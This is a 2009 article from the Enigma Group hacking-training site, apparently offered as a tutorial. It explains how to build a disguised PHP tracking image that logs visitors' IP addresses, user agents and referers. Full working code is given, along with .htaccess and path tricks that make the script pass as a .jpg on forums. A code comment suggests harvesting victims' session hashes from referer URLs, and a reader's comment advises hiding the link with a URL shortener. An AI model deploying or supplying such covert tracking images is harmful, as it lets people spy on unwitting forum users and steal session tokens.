EG Information
Training Missions
Knowledge Bank
Pimp Us Out!
Has Enigma Group Helped You? Then Help Us By Advertising For Us. Place One Of The Following Images On Your Site And Create A Link Back To Enigma Group.
|
| |
Affiliates
|
|
Enigma Group's Articles
Return to Category Selection
Stealing User Info with PHP Images - Submitted By: t3hmadhatt3r 2009-07-31 15:39:12
.:Intro:. Written by t3hmadhatt3r -- Contact me at t3hmadhatt3r@gmail.com. Hello mates. Here is a method of getting IP's and other info using the GD library. .:The Code:. Ok first we will use the GD library in php to generate a valid image in php. Here's some code to do just that: <?php
/* .:Made by t3hmadhtt3r -- t3hmadhatt3r@gmail.com:. .:Enjoy!:. */
// Defining Variables
$IP = $_SERVER['REMOTE_ADDR']; // Saves the IP $UA = $_SERVER['HTTP_USER_AGENT']; // Saves the User Agent $RE = $_SERVER['HTTP_REFERER']; // Saves the Referer $DATE = date('l jS of F Y h:i:s A'); $DATA = '<p>IP: '.$IP.'<br/><p>User Agent: '.$UA.'<br/><p>Referer: '.$RE.'<br/><p>Date: '.$DATE.'<br/><br/><br/>';
/*PS: Try using the referer logging feature to exploit forums and sites that keep useful info in the URL. Example: HTTP://WWW.LAMESITE.COM/POST.PHP?ID=4&HASH=(THE VICTIMS MD5 HASH)&USER=t3hmadhatt3r*/
// Writing the logs
$fp = fopen('Cool_Huh?.html', 'a'); fwrite($fp, $DATA); fclose($fp);
// Behold the mighty GD Library ^_^
header("Content-type: image/png"); $img = ImageCreate (1, 1); $bg = ImageColorAllocate ($img, 0, 0, 0); $txt = ImageColorAllocate ($img, 0, 0, 0); ImagePng($img);
// Later... ?>
More Info about that PHP GD library at http://us2.php.net/manual/en/book.image.php.:Faking the Extension:. Now we have a valid image but, how will we get it to work on forums that dont allow php as a image extension? Well there are two ways. One which is better than the other. 1. .htaccess (This is the best way) If you are using a server that allows you to configure your own .htaccess file than you can add the following line to execute all files with the .jpg extension as a php file. AddHandler application/x-httpd-php .jpg
Note: If you dont have a server that allows this I recommend looking at http://www.free-webhosts.com/search-webhosts.php?SA=.htaccess. Now you can rename the php file to jpg and it will still work! Tricky Aye? 2. Tricky Technique (This way works just the same but is suspicious) This technique can be done on most servers (I tried it on t35 and got some Permission errors... Probably because of the Jail Shell) but, It could get some attention from a admin pretty quickly. Just add a /image.jpg to the end of the PHP file. Example: http://subdomain.whatever.com/script.php/image.jpgThis will make it look like the extension is jpg but the php will ignore it and execute normally. .:Ending:. Now you can embed this image in forums just like any other image. Enjoy the code! -- t3hmadhatt3r; Return to Category Selection
Comment By: Link- 2009-08-03 19:26:51
just spoof the url with tiny.cc or something similar..
Comment By: Psiber_Syn 2009-08-04 16:58:36
If you wish to submit a comment, you must be a registered member and logged in. Login or Register.
Return to Category Selection
|
| |
|
|
Who Visited EnigmaGroup Today?
1396 Guests, 222 Users (217 Spiders)
famous0123, tgm001, Edika, junaid_junaid59, JohnJohnJohn, ssmaslov, Galagatron, psychomarine, Dregoon, cat1vo, plex, Patrickk, mjneat, Aska, Beat_Slayer, M0rdak, Ausome1, dark_void, Imre, TheCheeseDemon, rockcraft, Vreality2007, mmndglxuwn, m0rt, unholyblood, iterrumzz, VurbTrurb, CJ_Omaha, Mayonoula, MAMWOURBROR, mutabor, gobinda, cossyDrybrich, Razin, zaCruBumas8, hunja, johny34, pantoufle, bagy, arctica, hackarchives, UsedDeteKef, Peculator, Fadhilat606, TheTrueMonarch, Pascall01, hackaday, Tjm, arndevil, flairvelocity, lol, alphbond, kdivanov, elizbethallis6, Rik, bn11, BorgBot, SHASHANK101hello, 4poc4lyptic, ksajxai, nbmorri1, electro-technic, saraf, شمالي عرعر, lamb, AutobotPrime, Underleaf, The End, tomtombomb, killobyte, snowgirlx, so_saucey, zerolife, Althor, Cramps, Hekser, Hyperborn, cyber-guard, jhgrunn, cobra, Partisan, MAZI_, cyborg, GenbreedX, moel77, cliptoX, pwnpwnlolz, letshavepie, Mrwormz, yshiau, mirmo, roozyoppomo, soft_devil, cls777, scoobywan, Reiversed, joshua, st3alth, Afrika, PaiffDryday, venter, Anthony12796, sh3llcod3, 8FIGURE, Rannim, Evil1, maloaboy, BACanON, SlayingDragons, Repuhlsive, IvanDimitriev, lolzsec, 1RiB, mzungudo, Micro_Geek, iMaxx, aciboummamymn, k0unterkulcher, somebody777, m14m16, GoododotAlcob, negasora, Rastii, UninueMem, Swifsolja, ad.conquest, ngolatkar, Infinity8, Jigoku, thesupervisor, p0is0n5ting, kernel_mod, AKL, GothicLogic, themastersinner, dnatrixene135, ChewBigRed, kalak55, sejem, cve916, pollolololo, triecturn, Violatedsmurf, Ops, jmp, xsiemich, generalisimo, strudels, ga3ttpom, KingOfBritains, epoch_qwert, suten, FriskyKat, Ryuske, Adonis Achilles, ubqbcdzzhf, 3vil, Nightraven, US£RNAM£, Weindittewcon, Batesheelocot, GSmyrlis, MaxMeier, Elite.America, rabbidmind, Psiber_Syn, phoenix22, imittyerrotte, peewster, cyberturtle, ctb, dexgeda, sdw, Pizza, White_widdow, devarian, finesse, Nature112091777, Danc7171, Alphadragon, Estadagause, 53QR10U5, Xargos, Alkomage, hardlock, Barry Gonzoles, MineDweller, Gkjt, N4g4c3N, [I]nfectedbug, wimsteege, aqr5zdcw, xin214, Bugshuppy, SnoopSky, Hessesian, voodooKobra, sKcarr, IROverRated, W1F1G3NJU75U, Baddy, ziadmosaan, gamble86, realzs, CruelDemon, Shinju, aVoid, aquiredanonymity, kukumumu, web_request, callmeneon, KissMyDAFFODIL, Feld Grau, Abhinav2107, prabhataditya, mbuyiselo, shumer, phenom216, princennamdi, huskyboiza, ninety-nine, lucca65 |
| |
|
|
|
|
|